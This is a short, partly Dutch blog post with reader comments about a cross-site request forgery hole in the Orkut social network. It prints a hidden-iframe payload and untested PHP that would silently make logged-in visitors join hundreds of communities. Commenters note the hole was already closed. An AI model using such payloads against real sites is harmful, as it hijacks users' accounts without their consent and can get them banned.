Orkut Security Problems
Aan al de Orkutjes outthere die het zou kunnen schelen:
A simple inline-frame, hidden in the browser by absolute-positioning it with negative values, can trigger the “add as friend” or “join community” command.
<iframe style="width:1px;
height:1px;
position:absolute;
top:-31337px;
left:-31337px"
src="http://www.orkut.com/Community.aspx?cmm=19657&cmd=add">
</iframe>
Another script shows how wrong it was for the Google-programmers to have GET requests become active like POST requests (as opposed to staying passive as is advised for them). If I would put the script on my site, my visitors who are still logged in to Orkut might be banned from Orkut because they join 300 communities at once.
PHP (untested) folllows:
<?
$i = 100;
while($i < 400)
{
echo "<iframe src=http://www.orkut.com/";
echo "Community.aspx?cmm=$i&cmd=add></iframe>";
$i++;
}
?>
reacties (3)
Orkut? Special spy from Mars or is it called Sedna ? Mystifying names i don’t trust.
Orkut zuigt en mag kapot vallen.
Dat is al weken oud en kan intussen niet meer
Damn, en ik dacht eens op tijd te zijn.